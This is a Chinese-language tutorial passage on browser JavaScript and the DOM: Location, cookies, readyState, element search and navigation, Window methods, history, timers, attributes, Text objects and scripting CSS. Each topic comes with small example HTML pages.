compatMode属性返回值有两个:
• CSS1Compat:代表此文档遵循某个有效的HTML规范(但不必是HTML5,有效的HTML4文档也会返回这个值)
• BackCompat:代表此文档含有非标准的功能,已触发怪异模式
使用Location对象
Location对象的属性和方法 说明
protocol 获取或设置文档URL的协议部分
host 获取或设置文档URL的主机和端口部分
href 获取或设置当前文档的地址
hostname 获取或设置文档URL的主机名部分
port 获取或设置文档URL的端口部分
pathname 获取或设置文档URL的路径部分
search 获取或设置文档URL的查询(问号串)部分
hash 获取或设置文档URL的锚(井号串)部分
assign(URL) 导航到指定的URL上
replace(URL) 清除当前文档并导航到URL所指定的那个文档
reload() 重新载入当前的文档
resolveURL(URL) 将指定的相对URL解析成绝对URL
Chap3-39.html
<body>
<button id="pressme">Press Me</button>
<script>
document.writeln("<pre>");
document.writeln("protocol:"+document.location.protocol);
document.writeln("host:"+document.location.host);
document.writeln("hostname:"+document.location.hostname);
document.writeln("href:"+document.location.href);
document.writeln("port:"+document.location.port);
document.writeln("pathname:"+document.location.pathname);
document.writeln("search:"+document.location.search);
document.writeln("hash:"+document.location.hash);
document.writeln("</pre>");
document.getElementById("pressme").onclick=function () {
document.location.assign("chap3-38.html");
}
</script>
</body>
读取和写入cookie
cookie属性让你可以读取、添加和更新文档所关联的cookie。cookie是形式为name=value的名称/值对。如果存在多个cookie,那么cookie属性会把它们一起返回,之间以分号间隔。
在创建cookie时,可以添加额外字段来改变cookie的处理方式:
额外项 说明
path=path 设置cookie关联的路径,如果没有指定则默认使用当前文档的路径
domain=domain 设置cookie关联的域名,如果没有指定则默认使用当前文档的域名
max-age=seconds 设置cookie的有效期,以秒的形式从它创建之时起开始计算
expires=date 设置cookie的有效期,用的是GMT格式的日期,如果没有指定则cookie会在对话结束时过期
secure 只有在安全(HTTPS)连接时才会发送cookie
Chap3-40.html
<body><p id="cookiedata"></p><button id="write">Add Cookie</button>
<button id="update">Update Cookie</button><button id="read">Read Cookie</button>
<button id="maxage">max-age</button>
<script>
var cookieCount=0;
document.getElementById("update").onclick=function () {
document.cookie="Cookie_"+cookieCount+"=Updated_"+cookieCount;
readCookies();
}
document.getElementById("write").onclick=function () {
cookieCount++;
document.cookie="Cookie_"+cookieCount+"=Value_"+cookieCount;
readCookies();
}
document.getElementById("read").onclick=function () {
readCookies();
}
document.getElementById("maxage").onclick=function () {
document.cookie="Cookie_"+cookieCount+"=Updated_"+cookieCount+";max-age=5";
}
function readCookies() {
document.getElementById("cookiedata").innerHTML=document.cookie;
}
</script></body>
readyState属性
document.readyState属性提供了加载和解析HTML文档过程中当前处于哪个阶段的信息。在默认情况下,浏览器会在遇到文档里的script元素时立即开始执行脚本,但你可以使用defer属性推迟脚本的执行。
readyState 说明
loading 浏览器正在加载和处理此文档
interactive 文档已被解析,但浏览器还在加载其中链接的资源(图像和媒体文件等)
complete 文档已被解析,所有的资源也已加载完毕
Chap3-41.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>chap3-41</title>
</head>
<body>
<script>
document.onreadystatechange=function () {
if(document.readyState=="interactive"){
document.getElementById("pressme").onclick=function () {
document.getElementById("results").innerHTML="Button Pressed";
}
}
}
</script>
<button id="pressme">Press Me</button>
<p id="results"></p>
</body>
</html>
使用属性获取HTML元素对象
属性 说明
activeElement 返回一个代表当前带有键盘焦点元素的对象
body 返回一个代表body元素的对象
Embeds plugins 返回所有代表embed元素的对象
forms 返回所有代表form元素的对象
head 返回一个代表head元素的对象
images 返回所有代表img元素的对象
links 返回所有代表文档里具备href属性的aarea元素的对象
scripts 返回所有代表script元素的对象
Chap3-42.html
namedItem方法会返回集合里带有指定idname属性值的项目。
<head>
<style>
div{border:medium black double;}
p{font-size: x-large;}
</style>
</head>
<body>
<div id="results"></div>
<img id="apple" src="pic/apple.jpg" height="100">
<p>I like apples</p>
<img id="sun" src="pic/sun.jpg" height="100">
<p>I love sun</p>
<script>
var resultsElement=document.getElementById("results");
var elems=document.images;
for(var i=0;i<elems.length;i++){
resultsElement.innerHTML+="Image Elements: "+elems[i].id+"<br>";
}
var srcValue=elems.namedItem("apple").src;
resultsElement.innerHTML+="Src for apple element is: "+srcValue+"<br>";
</script>
</body>
搜索元素
属性 说明
getElementById(id) 返回带有指定id值的元素
getElementsByClassName(class) 返回带有指定class值的元素
getElementsByName(name) 返回带有指定name值的元素
getElementsByTagName(tag) 返回指定类型的元素
querySelector(selector) 返回匹配指定CSS选择器的第一个元素
querySelectorAll(selector) 返回匹配指定CSS选择器的所有元素
Chap3-43.html
这个例子中的选择器会匹配所有的p元素和id值为appleimg元素。
<head><style>p{font-size: x-large;color: white;background-color: grey}
div{font-size: x-large;border: medium double black} </style></head>
<body>
<div id="results"></div>
<img id="apple" class="pictures" name="myapple" src="pic/apple.jpg" height="100">
<p>I like apples</p>
<img id="sun" class="pictures" src="pic/sun.jpg" height="100">
<p>I love sun</p>
<script>
var resultsElement=document.getElementById("results");
var pElems=document.getElementsByTagName("p");
resultsElement.innerHTML+="There are "+pElems.length+" p elements. <br>";
var imgElems=document.getElementsByClassName("pictures");
resultsElement.innerHTML+="There are "+imgElems.length+" elements in the pictures class. <br>";
var nameElems=document.getElementsByName("myapple");
resultsElement.innerHTML+="There are "+nameElems.length+" elements with the name 'apple'. <br>";
var cssElems=document.querySelectorAll("p,img#apple");
resultsElement.innerHTML+="The selector matched "+cssElems.length+" elements. <br>";
</script>
</body>
合并进行链式搜索
DOM的一个实用功能是几乎所有Document对象实现的搜索方法同时也能被HTMLElement对象实现,从而可以合并进行链式搜索。唯一的例外是getElementById方法,只有Document对象才能使用它。
Chap3-44.html
<head><style>p{font-size: x-large;color: white;background-color: grey}
div{font-size: x-large;border: medium double black}
span{font-size: x-large;display: block;height: 100px}
.s1{display: inline-block} </style></head>
<body>
<div id="results"></div>
<p id="tblock">
<span><img id="apple" src="pic/apple.jpg" height="100"></span>
<span>I like <span class="s1" style="color: red">apples</span> and <span class="s1" style="color: yellow">bananas</span> </span>
<span><img id="sun" src="pic/sun.jpg" height="100"></span>
<span>I love sun</span>
</p>
<script>
var resultsElement=document.getElementById("results");
var spanelems=document.getElementById("tblock").getElementsByTagName("span");
resultsElement.innerHTML+="There are "+spanelems.length+" span elements. <br>";
var imgElems=document.getElementById("tblock").querySelectorAll("img");
resultsElement.innerHTML+="There are "+imgElems.length+" img elements. <br>";
var s1elems=document.getElementById("tblock").querySelectorAll("#tblock>span");
resultsElement.innerHTML+="There are "+s1elems.length+" span (not s1) elements. <br>";
</script>
</body>
在DOM树里导航
另一种搜索元素的方法是将DOM视为一棵树,然后在它的层级结构里导航。
navigation属性 说明
childNodes 返回子元素组
firstChild 返回第一个子元素
hasChildNodes() 如果当前元素有子元素就返回true
lastChild 返回倒数第一个子元素
nextSibling 返回定义在当前元素之后的兄弟元素
parentNode 返回父元素
previousSibling 返回定义在当前元素之前的兄弟元素
Chap3-45.html
<head>
<meta charset="UTF-8">
<title>chap3-45</title>
<style>
p{font-size: x-large;}
div{font-size: x-large;border: medium double black}
</style>
</head>
<body id="mybody">
<div id="results"></div>
<p id="pApple"><img id="apple" src="pic/apple.jpg" height="100"></p>
<p id="pFruits">I like apples and bananas</p>
<p id="pSun"><img id="sun" src="pic/sun.jpg" height="100"></p>
<p id="pSun">I love sun</p>
<p id="pButton">
<button id="parent">Parent</button>
<button id="child">First Child</button>
<button id="prev">Prev Sibling</button>
<button id="next">Next Sibling</button>
</p>
<script>
var resultsElement=document.getElementById("results");
var element=document.body;
var buttons=document.getElementsByTagName("button");
for(var i=0;i<buttons.length;i++){
buttons[i].onclick=handleButtonClick;
}
processNewElement(element);
function handleButtonClick(e) {
if(element.style){
element.style.backgroundColor="white";
}
if(e.target.id=="parent" && element!=document.body){
element=element.parentNode;
}else if(e.target.id=="child" && element.hasChildNodes()){
element=element.firstChild;
}else if(e.target.id=="prev" && element.previousSibling){
element=element.previousSibling;
}else if(e.target.id=="next" && element.nextSibling){
element=element.nextSibling;
}
processNewElement(element);
if(element.style){
element.style.backgroundColor="lightgrey";
}
}
function processNewElement(elem) {
resultsElement.innerHTML="Element type: "+elem+"<br>";
resultsElement.innerHTML+="Element id: "+elem.id+"<br>";
resultsElement.innerHTML+="Has child nodes: "+elem.hasChildNodes()+"<br>";
if(elem.previousSibling){
resultsElement.innerHTML+="Prev sibling is: "+elem.previousSibling+"<br>";
}else {
resultsElement.innerHTML+="No prev sibling<br>";
}
if(elem.nextSibling){
resultsElement.innerHTML+="Next sibling is: "+elem.nextSibling+"<br>";
}else {
resultsElement.innerHTML+="No next sibling<br>";
}
}
</script>
</body>
Window对象
问题 解决方案
获取一个Window对象 使用document.defaultView或全局变量window
获取某个窗口的信息 使用window的信息性属性
与窗口进行交互 使用Window对象定义的方法
用模式对话框窗口提示用户 在某个Window对象上使用alertconfimpromptshowModalDialog方法
对浏览器历史执行简单的操作 Window.history属性返回的History对象使用backforwardgo方法
操控浏览器历史 Window.history属性返回的History对象使用pushStatereplaceState方法
向运行在另一个文档中的脚本发送消息 使用跨文档消息传递功能
设置一次性或重复性计时器 在Window对象上使用setIntervalsetTimeoutclearIntervalclearTimeout方法
获取Window对象
可以用两种方式获得Window对象:
• document对象的defaultView属性
• 全局变量window
Chap3-46.html
<head>
<meta charset="UTF-8">
<title>chap3-46</title>
<style>
td{font-size: x-large;border: solid black thin}
th{font-size: x-large;border: solid black thin}
table{border: solid black thin}
</style>
</head>
<body>
<table>
<tr><th>outerWidth:</th><td id="owidth"></td> </tr>
<tr><th>outerHeight:</th><td id="oheight"></td> </tr>
</table>
<script>
document.getElementById("owidth").innerHTML=window.outerWidth;
document.getElementById("oheight").innerHTML=document.defaultView.outerHeight;
</script>
</body>
获取窗口信息
窗口属性 说明
innerHeight 获取窗口内容区域的高度
innerWidth 获取窗口内容区域的宽度
outerHeight 获取窗口的高度,包括边框和菜单栏等
outerWidth 获取窗口的宽度,包括边框和菜单栏等
pageXOffset 获取窗口从左上角算起水平滚动过的像素数
pageYOffset 获取窗口从左上角算起垂直滚动过的像素数
screen 返回一个描述屏幕的Screen对象
screenLeft 获取从窗口左边缘到屏幕左边缘的像素数(不是所有浏览器都同时实现了这两个属性,或是以同样的方法计算这个值)
screenTop 获取从窗口上边缘到屏幕上边缘的像素数(不是所有浏览器都同时实现了这两个属性,或是以同样的方法计算这个值)
Chap3-46.html
<body>
<table>
<tr><th>outerWidth:</th><td id="owidth"></td> </tr>
<tr><th>outerHeight:</th><td id="oheight"></td> </tr>
<tr><th>innerWidth:</th><td id="iwidth"></td> </tr>
<tr><th>innerHeight:</th><td id="iheight"></td> </tr>
<tr><th>screenWidth:</th><td id="swidth"></td> </tr>
<tr><th>screenHeight:</th><td id="sheight"></td> </tr>
<tr><th>screenLeft:</th><td id="sleft"></td> </tr>
<tr><th>screenTop:</th><td id="stop"></td> </tr>
</table>
<script>
document.getElementById("owidth").innerHTML=window.outerWidth;
document.getElementById("oheight").innerHTML=document.defaultView.outerHeight;
document.getElementById("iwidth").innerHTML=window.innerWidth;
document.getElementById("iheight").innerHTML=window.innerHeight;
document.getElementById("swidth").innerHTML=window.screen.width;
document.getElementById("sheight").innerHTML=window.screen.height;
document.getElementById("sleft").innerHTML=window.screenLeft;
document.getElementById("stop").innerHTML=window.screenTop;
</script>
</body>
上表中使用了screen属性来获取一个Screen对象,这个对象提供了显示此窗口的屏幕信息,其属性有:
screen属性 说明
availHeight 屏幕上可供显示窗口部分的高度(排除工具栏和菜单栏之类)
availWidth 屏幕上可供显示窗口部分的宽度(排除工具栏和菜单栏之类)
colorDepth 屏幕的颜色深度
height 屏幕的高度
width 屏幕的宽度
与窗口进行交互
Window对象提供了一组方法,可以用它们与包含文档的窗口进行交互。
方法名称 说明
blur() 让窗口失去键盘焦点
close() 关闭窗口(不是所有浏览器都允许某个脚本关闭窗口)
focus() 让窗口获得键盘焦点
print() 提示用户打印页面
scrollBy(x,y) 让文档相对于当前位置进行滚动
scrollTo(x,y) 滚动到指定的位置
stop() 停止载入文档
Chap3-47.html
<head><style>p{width: 1000px;font-size: large} img{display: block} </style></head>
<body>
<p><button id=“scroll”>Scroll</button><button id=“print”>Print</button>
<button id=“close”>Close</button>
</p>
<p> In ecology, primary compounds as … <img src=“pic/globalGPP.jpg”>
Gross primary production (GPP) is…. <img src=“pic/globalNPP.jpg”>
</p>
<script>
var buttons=document.getElementsByTagName("button");
for(var i=0;i<buttons.length;i++){
buttons[i].onclick=function (e) {
if(e.target.id=="print"){
window.print();
}else if(e.target.id=="close"){
window.close();
}else{
window.scrollTo(0,400);
}
}
}
</script>
</body>
对用户进行提示
Window对象包含一组方法,能以不同的方式对用户进行提示。
方法名称 说明
alert(msg) 向用户显示一个对话框窗口并等候其被关闭
confirm(msg) 显示一个带有确认和取消提示的对话框窗口
prompt(msg,val) 显示对话框提示用户输入一个值
showModalDialog(url) 弹出一个窗口,显示指定的URL
showModalDialog方法已经被广告商们严重滥用了,很多浏览器对这个功能加以限制,仅允许用户事先许可的网站使用。
Chap3-48.html
<body>
<button id="alert">Alert</button>
<button id="confirm">Confirm</button>
<button id="prompt">Prompt</button>
<button id="modal">Modal Dialog</button>
<script>
var buttons=document.getElementsByTagName("button");
for(var i=0;i<buttons.length;i++){
buttons[i].onclick=function (e) {
if(e.target.id=="alert"){
window.alert("This is an alert");
}else if(e.target.id=="confirm"){
var confirmed=window.confirm("This is a confirm - do you want to proceed?");
alert("Confirmed? "+confirmed);
}else if(e.target.id=="prompt"){
var response=window.prompt("Enter a world","hello");
alert("The word was "+response);
}else if(e.target.id=="modal"){
window.showModalDialog("http://www.njfu.edu.cn");
}
}
}
</script>
</body>
使用浏览器历史
Window.history属性返回一个History对象,可以对浏览器历史进行一些基本的操作。
名称 说明
back() 在浏览器历史中后退一步
forward() 在浏览器历史中前进一步
go(index) 转到相对于当前文档的某个浏览历史位置。正值是前进,负值是后退
length 返回浏览历史中项目数量
Chap3-49.html
<body>
<button id="back">Back</button>
<button id="forward">Forward</button>
<button id="go">Go -1</button>
<script>
var buttons=document.getElementsByTagName("button");
for(var i=0;i<buttons.length;i++){
buttons[i].onclick=function (e) {
if(e.target.id=="back"){
window.history.back();
}else if(e.target.id=="forward"){
window.history.forward();
}else if(e.target.id=="go"){
window.history.go(-1);
}
}
}
document.writeln("<a href=\"chap3-47.html\">浏览历史中项目数:"+window.history.length+"</a>");
</script>
</body>
使用计时器
Window对象提供的计时方法有:
方法名称 说明
clearInterval(id) 撤销某个时间间隔计时器
clearTimeout(id) 撤销某个超时计时器
setInterval(function,time) 创建一个计时器,每隔time毫秒调用指定的函数
setTimeout(function,time) 创建一个计时器,等待time毫秒后调用指定的函数
setTimeout方法创建的计时器只执行一次指定函数,而setInterval方法会重复执行某个函数。这两个方法返回一个唯一的标识符,可以用clearIntervalclearTimeout方法来撤销计时器。
Chap3-50.html
<body>
<p id="msg"></p>
<button id="settime">Set Time</button>
<button id="cleartime">Clear Time</button>
<button id="setinterval">Set Interval</button>
<button id="clearinterval">Clear Interval</button>
<script>
var timeID,intervalID,count=0,buttons=document.getElementsByTagName("button");
for(var i=0;i<buttons.length;i++){
buttons[i].onclick=function (e) {
if(e.target.id=="settime"){
timeID=window.setTimeout(function () {
displayMsg("Timeout Expired");
},5000);
displayMsg("Timeout Set");
}else if(e.target.id=="cleartime"){
window.clearTimeout(timeID);
displayMsg("Timeout Cleared");
}else if(e.target.id=="setinterval"){
intervalID=window.setInterval(function () {
displayMsg("Interval expired. Counter: "+count++);
},1000);
displayMsg("Interval Set");
}else if(e.target.id=="clearinterval"){
window.clearInterval(intervalID);
displayMsg("Interval Cleared");
}
}
}
function displayMsg(msg) {
document.getElementById("msg").innerHTML=msg;
}
</script>
</body>
使用DOM元素
问题 解决方案
获取元素的信息 使用HTMLElement的元数据属性
获取或设置包含某个元素所属全部类的单个字符串 使用className属性
检查或修改元素的各个类 使用classList属性
获取或设置元素的属性 使用attributegetAttributesetAttributeremoveAttributehasAttribute方法
获取或设置元素的自定义属性 使用dataset属性
操作元素的文本内容 使用Text对象
创建或删除元素 使用以document.create开头的方法以及用于管理子元素的HTMLElement方法
复制元素 使用cloneNode方法
移动元素 使用appendChild方法
比较两个对象是否相同 使用isSameNode方法
比较两个元素是否相同 使用isEqualNode方法
直接操作HTML片段 使用innerHTMLouterHTML属性以及insertAdjacentHTML方法
在文本块里插入元素 使用splitTextappendChild方法
使用元素对象
HTMLElement对象提供了一组属性,可以用来读取和修改被代表元素的数据。
元素数据属性 说明 元素数据属性 说明
checked 获取或设置checked属性是否存在 id 获取或设置id属性的值
classList 获取或设置元素所属的类列表 lang 获取或设置lang属性的值
className 获取或设置元素所属的类列表 spellcheck 获取或设置spellcheck属性是否存在
dir 获取或设置dir属性的值 tabIndex 获取或设置tabIndex属性的值
disabled 获取或设置disabled属性是否存在 tagName 返回标签名(标识元素类型)
hidden 获取或设置hidden属性是否存在 title 获取或设置title属性的值
Char3-57.html
<style>.p1{font-size: x-large;border: medium double black}
</style>
<body>
<p id="block1" lang="en" dir="ltr" class="p1" title="favFruits">
I like <span id="apple">apples</span> and <span id="banana">banana</span>.
</p>
<pre id="results"></pre>
<script>
var results=document.getElementById("results");
var elem=document.getElementById("block1");
results.innerHTML+="tag:"+elem.tagName+"\n";
results.innerHTML+="id:"+elem.id+"\n";
results.innerHTML+="dir:"+elem.dir+"\n";
results.innerHTML+="lang:"+elem.lang+"\n";
results.innerHTML+="hidden:"+elem.hidden+"\n";
results.innerHTML+="disabled:"+elem.disabled+"\n";
results.innerHTML+="classList:"+elem.classList+"\n";
results.innerHTML+="title:"+elem.title+"\n";
</script>
</body>
可以用两种方法处理某个元素所属的类:
• className属性:它返回一个类的列表,通过改变这个字符串的值,可以添加或移除类。
• classList属性:它返回一个DOMTokenList对象。
DOMTokenList对象成员 说明
add(class) 给元素添加指定的类
contains(class) 如果元素属于指定的类就返回true
length 返回元素所属类的数量
remove(class) 从元素上移除指定的类
toggle(class) 如果类不存在就添加它,如果存在就移除它
Char3-57.html
<head>
<style>
.fontSize{font-size: x-large}
.border{border: medium double black}
.big{height: 100px;width: 600px;}
.small{height: 50px;width: 300px;}
.green{background-color: green;}
.blue{background-color: blue;}
.white{color: white}
.red{color: red}
pre{font-size: x-large;border: thin black solid}
</style>
</head>
<body>
<p id="block1" lang="en" dir="ltr" class="fontSize big green" title="favFruits">
I like <span id="apple">apples</span> and <span id="banana">banana</span>.
</p>
<pre id="results"></pre>
<button id="btn1">添加边框</button>
<button id="btn2">大小变化</button>
<button id="btn3">背景色变化</button>
<button id="btn4">前景色变化</button>
<script>
var results=document.getElementById("results");
var elem=document.getElementById("block1");
var buttons=document.getElementsByTagName("button");
showElementProperties();
for(var i=0;i<buttons.length;i++){
buttons[i].onclick=function (e) {
if(e.target.id=="btn1"){
elem.className+=" border";
}else if(e.target.id=="btn2"){
elem.classList.toggle("small");
}else if(e.target.id=="btn3"){
elem.classList.toggle("blue");
}else if(e.target.id=="btn4"){
if(elem.classList.contains("white")){
elem.classList.remove("white");
elem.classList.add("red");
}else{
elem.classList.add("white");
elem.classList.remove("red");
}
}
showElementProperties();
}
}
function showElementProperties() {
results.innerHTML="tag:"+elem.tagName+"\n";
results.innerHTML+="id:"+elem.id+"\n";
results.innerHTML+="dir:"+elem.dir+"\n";
results.innerHTML+="lang:"+elem.lang+"\n";
results.innerHTML+="hidden:"+elem.hidden+"\n";
results.innerHTML+="disabled:"+elem.disabled+"\n";
results.innerHTML+="classList:"+elem.classList+"\n";
results.innerHTML+="title:"+elem.title+"\n";
}
</script>
</body>
使用元素属性
HTMLElement对象成员 说明
attributes 返回应用到元素上的属性
dataset 返回以data-开头的属性
getAttribute(name) 返回指定属性的值
hasAttribute(name) 如果元素带有指定的属性则返回true
removeAttribute(name) 从元素上移除指定属性
setAttribute(name,value) 应用一个指定名称和值的属性
Chap3-58.html
<head><style>.p1{font-size: x-large;border: medium double black}
pre{font-size: x-large;border: thin black solid}
</style></head>
<body>
<p id="block1" class="p1" lang="en-UK">
I like <span id="apple">apples</span> and <span id="banana">banana</span>.
</p>
<pre id="results"></pre>
<script>
var results=document.getElementById("results");
var elem=document.getElementById("block1");
results.innerHTML="Element has data-fruit attribute: "+ elem.hasAttribute("data-fruit")+"\n"
results.innerHTML+="Adding data-fruit attribute\n";
elem.setAttribute("data-fruit","apples");
results.innerHTML+="data-fruit value is: "+elem.getAttribute("data-fruit")+"\n";
var attrs=elem.attributes;
for(var i=0;i<attrs.length;i++){
results.innerHTML+="Name: "+attrs[i].name+" value: "+attrs[i].value+"\n";
}
</script>
</body>
使用Text对象
元素的文本内容是由Text对象代表的,它在文档模型里表现为元素的子对象。当浏览器在文档模型里生成p元素时,元素自身会有一个HTMLElement对象,内容则会有一个Text对象。
<p id="block1">
I like <b>apples</b> and banana.
</p>
Text对象
Text对象成员 说明
appendData(string) 把指定字符串附加到文本块末尾
data 获取或设置文本
deleteData(offset,count) 从文本中移除字符串。第一个数字是偏移量,第二个是要移除的字符数量
insertData(offset,string) 在指定偏移量处插入指定字符串
length 返回字符的数量
replaceData(offset,count,string) 用指定字符串替换一段文本
replaceWholeText(string) 替换全部文本
splitText(number) 将现有的Text元素在指定偏移量处一分为二
substringData(offset,count) 返回文本的子串
wholeText 获取文本
Chap3-59.html
<body>
<p id="block1" style="font-size: x-large;border: medium double black">
I like <b id="b1">apples</b> and banana.
</p>
<pre id="results"></pre>
<button id="pressme">Press Me</button>
<script>
var results=document.getElementById("results");
var elem=document.getElementById("block1");
document.getElementById("pressme").onclick=function () {
var textElem=elem.firstChild;
results.innerHTML="The element has "+textElem.length+" chars\n";
results.innerHTML+="The element is "+textElem.wholeText+"\n";
textElem.replaceData(5,1,"Do you");
var elemB=document.getElementById("b1");
var textB=elemB.firstChild;
textB.data="oranges";
}
</script>
</body>
修改DOM
DOM操纵成员 说明
appendChild(HTMLElement) 将指定元素添加为当前元素的子元素
cloneNode(boolean) 复制一个元素
compareDocumentPosition(HTMLElement) 判断一个元素的相对位置
innerHTML 获取或设置元素的内容
insertAdjacentHTML(pos,text) 相对于元素插入HTML
insertBefore(newElem,childElem) 在第二个子元素之前插入第一个元素
isEqualNode(HTMLElement) 判断指定元素是否与当前元素相同
isSameNode(HTMLElement) 判断指定元素是否就是当前元素
outerHTML 获取或设置某个元素的HTML和内容
removeChild(HTMLElement) 从当前元素上移除指定的子元素
replaceChild(HTMLElement, HTMLElement) 替换当前元素的某个子元素
createElement(tag) 创建一个属于指定标签类型的新HTMLElement对象
createTextNode(text) 创建一个带有指定内容的新Text对象
Chap3-60.html
<head>
<meta charset="UTF-8">
<title>chap3-60</title>
<style>
table{border: solid thin black;margin: 10px}
td{border:solid thin black;padding: 4px 5px}
</style>
</head>
<body>
<table>
<thead><tr><th>Name</th><th>Color</th></tr></thead>
<tbody id="fruitsBody">
<tr><td class="fruitName">Banana</td><td class="fruitColor">Yellow</td></tr>
<tr><td>Apple</td><td>Red</td></tr>
</tbody>
</table>
<button id="add">Add Element</button>
<button id="remove">Remove Element</button>
<button id="clone">Clone Element</button>
<script>
var tableBody=document.getElementById("fruitsBody");
document.getElementById("add").onclick=function () {
var row=tableBody.appendChild(document.createElement("tr"));
row.setAttribute("id","newrow");
var col=row.appendChild(document.createElement("td"));
col.appendChild(document.createTextNode("Plum"));
row.appendChild(document.createElement("td"))
.appendChild(document.createTextNode("Purple"));
}
document.getElementById("remove").onclick=function () {
var row=document.getElementById("newrow");
row.parentNode.removeChild(row);
}
document.getElementById("clone").onclick=function () {
var newElem=tableBody.getElementsByTagName("tr")[0].cloneNode(true);
newElem.getElementsByClassName("fruitName")[0].firstChild.data="pear";
newElem.getElementsByClassName("fruitColor")[0].firstChild.data="Yellow";
tableBody.appendChild(newElem);
}
</script>
</body>
脚本化CSS
行间样式
脚本化CSS就是使用javascript来操作CSS。引入CSS有3种方式:行间样式、外部样式和内部样式。
行间样式又叫内联样式,使用HTML的style属性进行设置:
<div id="test" style="height: 40px;width: 40px;background-color: blue;"></div>
element元素节点提供style属性,用来操作CSS行间样式,style属性指向cssStyleDeclaration对象。例如:
test.style.height = '30px';
如果一个CSS属性名包含一个或多个连字符,CSSStyleDeclaration属性名的格式应该是移除连字符,将每个连字符后面紧接着的字母大写:
<div id="test" style="height: 40px;width: 40px;background-color: blue;"></div>
console.log(test.style.backgroundColor)
• cssText属性:通过cssText属性能够访问到style特性中的CSS代码。在读模式下,cssText返回浏览器对style特性中CSS代码的内部表示;在写模式中,赋给cssText的值会重写整个style特性的值。
<div id="test" style="float: left">hello world</div>
<button id="pressme">Press Me</button>
<div id="results"></div>
<p>
<script>
var divTest=document.getElementById("test");
document.getElementById("results").innerHTML=divTest.style.cssText;
document.getElementById("pressme").onclick=function () {
divTest.style.cssText="font-size:x-large;float:right;background-color: blue;color: white";
}
</script>
• length属性:返回内联样式中的样式个数。
var divResults=document.getElementById("results");
divResults.innerHTML=divTest.style.length;
• item()方法:返回给定位置的CSS属性的名称。
var resFontsize=divTest.style.item(0);
• getPropertyValue()方法:返回给定属性的字符串值。
divResults.innerHTML=resFontsize+":"+divTest.style.getPropertyValue(resFontsize);
• getPropertyPriority()方法:如果给定的属性使用了!important设置,则返回important;否则返回空字符串。
<div id="results" style="height: 40px!important;width: 200px;background-color: lightgray"></div>
divResults.innerHTML=divResults.style.getPropertyPriority("height");
• setProperty()方法:将给定属性设置为相应的值,并加上优先级标志(important或一个空字符串),该方法无返回值。语法为:setProperty(propertyName,value,priority)
divResults.style.setProperty('height','20px','important');
• removeProperty()方法:从样式中删除给定属性,并返回被删除属性的属性值。
divResults.style.removeProperty('background-color');
Chap3-51.html
<body>
<div id="test" style="float: left">hello world</div>
<p>
<button id="cssText">cssText</button>
<button id="length">Length</button>
<button id="PropertyValue">getPropertyValue</button>
<button id="PropertyPriority">getPropertyPriority</button>
<button id="setProperty">setProperty</button>
<button id="removeProperty">removeProperty</button>
</p>
<div id="results" style="height: 40px!important;width: 200px;background-color: lightgray"></div>
<script>
var divTest=document.getElementById("test");
var divResults=document.getElementById("results");
divResults.innerHTML=divTest.style.cssText;
var buttons=document.getElementsByTagName("button");
for(var i=0;i<buttons.length;i++){
buttons[i].onclick=function (e) {
if(e.target.id=="cssText"){
divTest.style.cssText="font-size:x-large;float:right;background-color: blue;color: white";
}else if(e.target.id=="length"){
divResults.innerHTML="length:"+divTest.style.length;
}else if(e.target.id=="PropertyValue"){
var resFontsize=divTest.style.item(0);
divResults.innerHTML=resFontsize+":"+divTest.style.getPropertyValue(resFontsize);
}else if(e.target.id=="PropertyPriority"){
divResults.innerHTML=divResults.style.getPropertyPriority("height");
}
else if(e.target.id=="setProperty"){
divResults.style.setProperty('height','20px','important');
}else if(e.target.id=="removeProperty"){
divResults.style.removeProperty('background-color');
}
}
}
</script>
</body>
查询计算样式
元素的渲染结果是多个CSS样式博弈后的最终结果,浏览器会从多个来源汇聚样式以计算出该用哪个值来显示某一元素。浏览器用于显示某个元素的CSS属性值集合被称为计算样式。
元素的计算样式(computedStyle)是一组在显示元素时实际使用的属性值,也是用一个 CSSStyleDeclaration对象来表示的,但计算样式是只读的,主要通过getComputedStyle()方法实现。语法为:
document.defaultView.getComputedStyle(element[,pseudo-element])
//或
window.getComputedStyle(element[,pseudo-element])
//或
getComputedStyle(element[,pseudo-element])
getComputedStyle()方法接收两个参数:要取得计算样式的元素和一个伪元素字符串。如果不需要伪元素信息,第二个参数可以是nullgetComputedStyle()方法返回一个CSSStyleDeclaration对象,其中包含当前元素的所有计算的样式。
Chap3-52.html
<style>
#test:before{
content: "getComputedStyle";
width: 250px;
display: inline-block;
color: blue;
}
</style>
<div id="test" style="font-size:x-large;width: 500px;border: double medium black">hello world</div>
<script>
var divTest=document.getElementById("test");
document.writeln("缺省伪元素:");
document.writeln(document.defaultView.getComputedStyle(divTest).width);
document.writeln(window.getComputedStyle(divTest).width);
document.writeln(getComputedStyle(divTest).width);
document.writeln("伪元素:");
document.writeln(getComputedStyle(divTest,":before").width);
</script>
在使用getComputedStyle()方法的过程中,有如下注意事项:
• 对于fontbackgroundborder等复合样式,各浏览器处理不一样。chrome会返回整个复合样式,而IE9+、firefox和safari则输出空字符串''
document.writeln(getComputedStyle(divTest).font);
• 不论以什么格式设置颜色,浏览器都以rgb()rgba()的形式输出
document.writeln(getComputedStyle(divTest,":before").color);
• 在计算样式中,类似百分比等相对单位会转换为绝对值
#test:after{content: "!"; width: 1%; display: inline-block; color: blue;}
document.writeln(getComputedStyle(divTest,":after").width);
getComputedStyleelement.style的相同点就是二者返回的都是CSSStyleDeclaration对象,取相应属性值得时候都是采用的 CSS 驼峰式写法。
而不同点就是:
• element.style读取的只是元素的“内联样式”,即 写在元素的style属性上的样式;而getComputedStyle读取的样式是最终样式,包括了“内联样式”、“嵌入样式”和“外部样式”。
• element.style既支持读也支持写,我们通过element.style即可改写元素的样式。而getComputedStyle仅支持读并不支持写入。
我们可以通过使用getComputedStyle读取样式,通过element.style修改样式
脚本化CSS
在实际工作中,我们使用javascript操作CSS样式时,如果要改变大量样式,会使用脚本化CSS类的技术:
• style:我们在改变元素的少部分样式时,一般会直接改变其行间样式;
• cssText:改变元素的较多样式时,可以使用cssText
• css类:更常用的是使用css类,将更改前和更改后的样式提前设置为类名。只要更改其类名即可(参考3.2.3,Chap3-57);
• classList:如果要改变多个类名,使用classList更为方便(参考3.2.3,chap3-57)
<style>
.big{height: 100px;width: 100px;background-color: blue;}
.small{height: 50px;width: 50px;background-color: green;}
</style>
<div id="test" class="big" style="border: medium double black;font-size: 1em;color: white">hello world!</div>
var divTest=document.getElementById("test");
divTest.onclick=function () {
if(divTest.className=="big"){
divTest.className="small";
}else if(divTest.className=="small"){
divTest.className="big";
}
